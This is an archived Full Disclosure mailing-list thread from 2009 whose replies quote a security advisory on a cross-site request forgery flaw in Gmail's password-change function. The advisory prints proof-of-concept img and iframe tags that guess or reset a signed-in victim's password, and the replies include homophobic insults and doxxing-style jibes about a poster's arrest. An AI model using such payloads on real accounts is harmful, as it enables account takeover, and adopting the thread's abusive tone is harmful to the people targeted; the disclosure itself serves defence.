Full Disclosure mailing list archives
Re: Apple Safari ... DoS Vulnerability
From: "Valdis' Mustache" <security.mustache () gmail com>
Date: Wed, 4 Mar 2009 18:59:41 -0600
Rob,

Our young scholar does nonetheless have some sage advice for young ladies of colour.

http://www.helium.com/items/250130-advice-to-black-females

I was rather alarmed at his arrest and methamphetamine abuse, however one might presume that his recent weight training is part of a rehabilitation regimen.

http://www.coloradoan.com/article/20090117/NEWS01/901170316/1002/

Your humble servant,
Усы из Валдис

On Wed, Mar 4, 2009 at 6:44 PM, <bobby.mugabe () hushmail com> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Mr. Stark,

Your body fat seems to be fairly high; you should consider a cutting phase and quitting the muscle milk and whatever cheap steroids you use. You're looking like a fat dumb homosexual in those tights. Someone with your levels of insecurity shouldn't be in computer security.

- -bm

On Wed, 04 Mar 2009 16:44:50 -0500 Jason Starks <jstarks440 () gmail com> wrote:

Ah, probably not. Your stringing together words to make sentences is what I'll regret reading. I'll continue to use my muscle milk and you'll continue to work your 9-5. The world turns once again!

On Wed, Mar 4, 2009 at 4:06 PM, Valdis' Mustache <security.mustache () gmail com> wrote:

Mister Snarks,

I've never been anything but who I purport to be, the humble upper facial hair quadrant of a loquacious sysadmin. Low of birth, though noble in aspiration, a student of history and of the many mustaches who came before myself.

You, young scholar, should be wary, though! Prospective employers do make regular use of search engines, "googling" potential candidates to gain insight into possible character flaws! True, your clean and jerk abilities as archived on the YouTube are admirable, but acting a fool on security lists is something normally reserved only for those in academia, who are markedly difficult if not impossible to unseat from their comfortable chairs, as indisputably underscored by the e-antics of this mustache's owner, and, of course, Mssr. Schmehl.

You'll come to regret your lack of anonymity, as your posts will live on for eternity, much as I've come to regret my unfortunate association with the unruly beardlike growth connecting to me from the south, and my unavoidable tenuous connection with those objectionable and uncouth sideburns.

Your humble servant,
I baffi di Valdis

On Wed, Mar 4, 2009 at 12:55 PM, Jason Starks <jstarks440 () gmail com> wrote:

I know, it's insane. It is a new trend, though, just like people registering gmail accounts just to flame and troll on FD!

It's like, your credibility like, goes like, ok you start like at 0, and then like, it goes like to -1, and like, then even lower like. Absolutely genius.

x0x0x0x0x0x0x0x0x0x

On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee <biz.marqee () gmail com> wrote:

This was 2 years well spent... NOT!

Seriously, what is with all these people popping up releasing advisories that are absolute SHIT? Is it to try and get jobs or what?

On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security Advisories <advisories at isecauditors.com> wrote:

=============================================
INTERNET SECURITY AUDITORS ALERT 2007-003
- Original release date: August 1st, 2007
- Last revised: January 11th, 2009
- Discovered by: Vicente Aguilera Diaz
- Severity: 3/5
=============================================

I. VULNERABILITY
-------------------------
CSRF vulnerability in GMail service

II. BACKGROUND
-------------------------
Gmail is Google's free webmail service. It comes with built-in Google search technology and over 2,600 megabytes of storage (and growing every day). You can keep all your important messages, files and pictures forever, use search to quickly and easily find anything you're looking for, and make sense of it all with a new way of viewing messages as part of conversations.

III. DESCRIPTION
-------------------------
Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while cross-site request forgery merely transmits unauthorized commands from a user the website trusts.

GMail is vulnerable to CSRF attacks in the "Change Password" functionality. The only token used to authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request.
An attacker can create a page that includes requests to the "Change Password" functionality of GMail and modify the passwords of the users who, being authenticated, visit the page of the attacker.

The attack is facilitated since the "Change Password" request can be made with the HTTP GET method instead of the POST method that is habitually used by the "Change Password" form.

IV. PROOF OF CONCEPT
-------------------------
1. An attacker creates a web page "csrf-attack.html" that makes many HTTP GET requests to the "Change Password" functionality. For example, a password cracking of 3 attempts (see "OldPasswd" parameter):

...
<img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
<img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
<img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
...

or with hidden frames:

...
<iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
<iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
<iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
...

The attacker can deliberately use a weak new password (see "Passwd" and "PasswdAgain" parameters); this way he can know if the analysed password is correct without needing to modify the password of the victim user. Using weak passwords, the "Change Password" response is:

- "The password you gave is incorrect.", if the analysed password is not correct.

- "We're sorry, but you've selected an insecure password. In order to protect the security of your account, please click "Password Strength" to get tips on choosing a safer password.", if the analysed password is correct and the victim password is not modified.

If the attacker wants to modify the password of the victim user, the expected response message is: "Your new password has been saved - OK".

In any case, the attacker evades the restrictions imposed by the captcha of the authentication form.

2. A user authenticated in GMail visits the "csrf-attack.html" page controlled by the attacker. For example, the attacker sends a mail to the victim (a GMail account) and provokes the victim into visiting his page (social engineering). So, the attacker ensures that the victim is authenticated.

3. The password cracking is executed transparently to the victim.

V. BUSINESS IMPACT
-------------------------
- Selective DoS on users of the GMail service (changing user password).
- Possible access to the mail of other GMail users.

VI. SYSTEMS AFFECTED
-------------------------
Gmail service.

VII. SOLUTION
-------------------------
No solution provided by vendor.

VIII. REFERENCES
-------------------------
http://www.gmail.com

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
July 31, 2007: Initial release
August 1, 2007: Minor corrections.
December 30, 2008: Last details.

XI. DISCLOSURE TIMELINE
-------------------------
July 30, 2007: Vulnerability acquired by Internet Security Auditors.
August 1, 2007: Initial notification sent to the Google security team.
August 1, 2007: Google security team requests additional information about it and starts reviewing the vulnerability.
August 13, 2007: Request information about the status.
August 15, 2007: Google security team responds that they are still working on this.
September 19, 2007: Request for the status.
No response.
November 26, 2007: Request for the status. No response.
January 2, 2008: Request for the status. No response.
January 4, 2008: Request for the status. No response.
January 11, 2008: Request for the status. No response.
January 15, 2008: Request for the status. Automated response.
January 18, 2008: Google security team informs that they don't expect the behaviour to change in the short term, giving their justification. We deconstruct those arguments as insufficient. No more responses.
December 30, 2008: Request for the status. Confirmation from Google that they won't change their consideration about this.
January 11, 2009: Publication to Bugtraq. Rejected twice. No reasons.
March 03, 2009: General publication for disclosure in other lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkmvIAQACgkQhNp8gzZx3sifPQP/Z/JwoxHfL+/YWIumE6ohkDzHigcM
FFMGnJtPy1PUYahP2Kkq4oBUiFgNsqWsBjvNnp+hrILgO6w73OasuLZQSvYX7hCMK8k1
eK7r0H5fjSlqoRhkJSGhgBDL4H7q1nMrkr0x4zGO7Jeeeq8DuU23x2A1UvnJCE+RAo65
vFaHNwE=
=uYwk
-----END PGP SIGNATURE-----
Current thread:
- Re: Apple Safari ... DoS Vulnerability, (continued)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 03)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 03)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 03)
- Re: Apple Safari ... DoS Vulnerability Biz Marqee (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Jason Starks (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Valdis' Mustache (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Jason Starks (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Jason Starks (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Chris Evans (Mar 04)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 04)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Valdis' Mustache (Mar 04)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 04)